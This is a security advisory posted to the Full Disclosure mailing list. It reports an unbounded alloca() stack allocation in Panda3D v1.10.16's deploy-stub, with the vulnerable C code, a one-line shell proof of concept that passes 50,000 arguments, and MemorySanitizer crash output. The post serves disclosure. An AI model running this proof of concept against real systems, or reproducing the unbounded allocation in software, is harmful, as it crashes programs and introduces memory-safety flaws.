Full Disclosure mailing list archives

A memory safety vulnerability exists in the Panda3D deploy-stub executable
due to unbounded stack allocation using attacker-controlled input. The
issue allows a local attacker to trigger stack exhaustion and subsequent
use of uninitialized memory during Python interpreter initialization,
resulting in a reliable crash and undefined behavior. The vulnerability is
confirmed by MemorySanitizer (MSAN) as a use-of-uninitialized-value
originating from stack memory.

The deploy-stub executable allocates memory on the stack using alloca()
based directly on the process argument count (argc), which is fully
attacker-controlled. No bounds checking or validation is performed prior to
allocation.
Vulnerable Code
if (argc > 0) {
    argv_copy  = (wchar_t **)alloca(sizeof(wchar_t *) * argc);
    argv_copy2 = (wchar_t **)alloca(sizeof(wchar_t *) * argc);
}
Because alloca() allocates memory on the stack without initialization,
large values of argc cause excessive stack consumption and propagate
uninitialized stack memory into subsequent logic. During Python interpreter
initialization, this uninitialized data is later consumed by string
handling routines (strlen, strcmp), resulting in undefined behavior.

*Root Cause:*
* argc is attacker-controlled
* alloca() performs unbounded stack allocation
* Allocated memory is not initialized
* Stack exhaustion causes corruption and exposure of uninitialized stack
bytes
* Python initialization code consumes this tainted memory

*Impact:*
* *Denial of Service (DoS):* Reliable crash of deploy-stub
* *Memory Corruption: *Use of uninitialized stack memory (MSAN-verified)
* *Pre-authentication:* Triggered immediately on process start
* *Undefined Behavior:* Execution proceeds with corrupted stack state

*Proof of Concept:*
./deploy-stub $(printf 'A %.0s' {1..50000})


*Output:*Uninitialized bytes in strlen at offset 3 inside [0xe01000000050,
8)
==3236655==WARNING: MemorySanitizer: use-of-uninitialized-value
    #0 0xffffa06b66d4
 (/lib/aarch64-linux-gnu/libpython3.13.so.1.0+0x2b66d4) (BuildId:
9b2b167471b167d36ba5bebb0ec8b62e324eed40)
    #1 0xffffa06b3424
 (/lib/aarch64-linux-gnu/libpython3.13.so.1.0+0x2b3424) (BuildId:
9b2b167471b167d36ba5bebb0ec8b62e324eed40)
    #2 0xffffa06b67a4
 (/lib/aarch64-linux-gnu/libpython3.13.so.1.0+0x2b67a4) (BuildId:
9b2b167471b167d36ba5bebb0ec8b62e324eed40)
    #3 0xffffa06b6cc4
 (/lib/aarch64-linux-gnu/libpython3.13.so.1.0+0x2b6cc4) (BuildId:
9b2b167471b167d36ba5bebb0ec8b62e324eed40)
    #4 0xffffa06b711c
 (/lib/aarch64-linux-gnu/libpython3.13.so.1.0+0x2b711c) (BuildId:
9b2b167471b167d36ba5bebb0ec8b62e324eed40)
    #5 0xffffa06feccc
 (/lib/aarch64-linux-gnu/libpython3.13.so.1.0+0x2feccc) (BuildId:
9b2b167471b167d36ba5bebb0ec8b62e324eed40)
    #6 0xffffa06daf68
 (/lib/aarch64-linux-gnu/libpython3.13.so.1.0+0x2daf68) (BuildId:
9b2b167471b167d36ba5bebb0ec8b62e324eed40)
    #7 0xffffa06dc324
 (/lib/aarch64-linux-gnu/libpython3.13.so.1.0+0x2dc324) (BuildId:
9b2b167471b167d36ba5bebb0ec8b62e324eed40)
    #8 0xffffa06e04d0 in Py_InitializeFromConfig
(/lib/aarch64-linux-gnu/libpython3.13.so.1.0+0x2e04d0) (BuildId:
9b2b167471b167d36ba5bebb0ec8b62e324eed40)
    #9 0xffffa06e06c0 in Py_InitializeEx
(/lib/aarch64-linux-gnu/libpython3.13.so.1.0+0x2e06c0) (BuildId:
9b2b167471b167d36ba5bebb0ec8b62e324eed40)
    #10 0xaaaaba2aa0f0 in Py_FrozenMain
/root/panda3d/pandatool/src/deploy-stub/deploy-stub.c:466:5
    #11 0xaaaaba2ab9d8 in main
/root/panda3d/pandatool/src/deploy-stub/deploy-stub.c:751:12
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Current thread:

• Panda3d v1.10.16 deploy-stub Unbounded Stack Allocation Leading to Uninitialized Memory Ron E (Jan 05)